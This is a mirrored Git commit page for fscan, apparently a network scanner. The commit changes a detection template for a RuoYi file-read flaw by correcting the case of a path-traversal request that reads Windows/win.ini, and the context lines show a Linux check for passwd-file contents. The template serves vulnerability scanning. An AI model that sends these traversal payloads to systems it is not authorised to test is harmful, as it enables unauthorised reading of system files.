mirror of
https://github.com/shadow1ng/fscan.git
synced 2025-07-13 12:52:44 +08:00
Update ruoyi-management-fileread.yml
This commit is contained in:
parent
2c1bdd98ee
commit
6ee7bab188
@ -7,7 +7,7 @@ groups:
|
||||
response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
|
||||
windows:
|
||||
- method: GET
|
||||
path: /Common/download/resource?resource=/profile/../../../../Windows/win.ini
|
||||
path: /common/download/resource?resource=/profile/../../../../Windows/win.ini
|
||||
expression: |
|
||||
response.status == 200 && response.body.bcontains(b"for 16-bit app support")
|
||||
detail:
|
||||
|
Loading…
Reference in New Issue
Block a user